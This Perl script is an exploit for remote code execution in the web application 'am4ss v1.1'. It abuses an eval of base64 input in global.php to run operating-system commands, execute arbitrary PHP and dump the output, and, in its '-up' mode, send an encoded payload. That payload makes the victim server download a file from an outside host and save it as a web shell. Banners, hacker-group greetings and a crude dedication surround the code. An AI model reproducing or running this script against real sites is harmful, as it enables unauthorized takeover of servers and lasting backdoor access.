#!/usr/bin/perl -w
# Exploit Title: am4ss v1.1 Remote Code Execution
# Version: 1.1
# Author : Or4nG.M4n & i-Hmx < Dev Exploit
# Big Thnks 2 : i-Hmx , sA^Dev!L
# Big dicks to : Duck lamerz Team :))
# Tested on: Windows 8
use MIME::Base64;
use LWP::UserAgent;
use LWP::Simple;
# About ..
print q(
anti.virus.team | Or4nG.M4n | alm3refh.cOm Group
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
in the name of /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
| Sp Thnks 2 : sA^Dev!L , i-Hmx , h311 c0d3 , xSs m4n |
| Gr33tz : SarBoT511 , Dr.Silv3r , Demetre , Lagripe-Dz |
| Mr.DH , x-Sh4dow , Pir4t3 , b0x , SadhaCker , r00t3r |
+--------------------------------------------------------+
| Home :~# 1337s.cc , tryag.cc , sec4ever , r00t-s3c.com |
+--------------------------------------------------------+
);
# start
if($ARGV[0] =~ "-cm"){
$a1 = $ARGV[1];
$a2 = $ARGV[2];
print "
Please select function to use [system , exec , shell_exec]
function# ";
$func =<STDIN>;
for($faris=0;$faris<1000;$faris++)
{
print "
Command# ";
$execut =<STDIN>;
$exec = $func."('".$execut."');";
$cmd = encode_base64($exec);
$ex = $a1 ."\x2F". $a2 ."global.php?fa=". $cmd ."&bn=eval(base64_decode(\$fa));;";
my $content = get $ex;
if(!$content){
}else{
print "\nExecuting cmd ..\n\n";
}
print $content;
}
}
# End
#injection func
if($ARGV[0] =~ "-ev"){
$a1 = $ARGV[1];
$a2 = $ARGV[2];
print "Write PHP code to be executed on the remote site [ don't use <? or ?> ]
Example:phpinfo();";
print "
choose file to dump the results in (eg 1337s.htm)
File name# ";
$myf =<STDIN>;
for($faris=0;$faris<1000;$faris++)
{
print "Eval# ";
$evalcode =<STDIN>;
$evalencoded = encode_base64($evalcode);
$strike = $a1 ."\x2F". $a2 ."global.php?fa=". $evalencoded ."&bn=eval(base64_decode(\$fa));;";
my $content = get $strike;
if(!$content){
}else{
print "\nDumping Results\n\n";
}
open(lst,">>$myf\n");
print lst"$content\n";
close(lst);
}
}
#ended
if($ARGV[0] =~ "-up"){
$a1 = $ARGV[1];
$a2 = $ARGV[2];
$ex = $a1."\x2F".$a2."global.php?fa=JGZpbGUgPSBmb3Blbigib3I0bmcucGhwIiAsIncrIik7JHNhPWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vdHJhdjFhbi50MzUuY29tL3I1dC50eHQiKTskd3JpdGUgPSBmd3JpdGUgKCRmaWxlICwkc2EpOw==&bn=eval(base64_decode(\$fa));;";
my $content = get $ex;
print "Exploiter\n";
sleep(4);
print "done .. > $a1 $a2 > or4ng.php < shell.php Enjoy";
}
if($ARGV[0] =~ ""){
print q(
anti.virus.team | Or4nG.M4n
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
+-----in the name of /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
| Upload Shell Use : perl am4ss.pl -up http://localhost/ Path/ |
| Cmd By Functions : perl am4ss.pl -cm http://localhost/ Path/ |
| Eval php code : perl am4ss.pl -ev http://localhost/ Path/ |
+--------------------------------------------------------------+
);
}
# Coded By Or4nG.M4n ..
